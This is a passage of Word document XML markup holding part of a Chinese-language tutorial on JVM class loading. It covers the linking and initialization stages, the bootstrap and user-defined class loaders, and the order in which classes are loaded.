          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>链接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>链接过程负责对二进制字节码的格式进行校验、初始化装载类中的静态变量以及解析类中调用的接口、类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>完成校验后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>初始化类中的静态变量，并将其值赋为默认值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>最后对类中的所有属性、方法进行验证，以确保其需要调用的属性、方法存在，以及具备应的权限（例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>域权限等），会造成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NoSuchMethodError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NoSuchFieldError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>等错误信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>初始化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>初始化过程即为执行类中的静态初始化代码、构造器代码以及静态属性的初始化，在四种情况下初始化过程会被触发执行：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>调用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>反射调用了类中的方法；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>子类调用了初始化；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>启动过程中指定的初始化类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </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Style w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>类加载顺序：</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Style w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>两种类装载器包括：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>启动类装载器和用户自定义类装载器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="351"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>启动类装载器是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实现的一部分；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="351"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>用户自定义类装载器则是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>程序的一部分，必须是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>类的子类。</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Style w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>装载顺序：</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Fonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>                Jvm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>启动时，由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Bootstrap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>User-Defined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方向加载类；</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Fonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>应用进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时，由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>User-Defined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Bootstrap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方向查找并加载类；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Bootstrap ClassLoader</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的根</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，它是用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实现的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>启动时初始化此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，并由此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
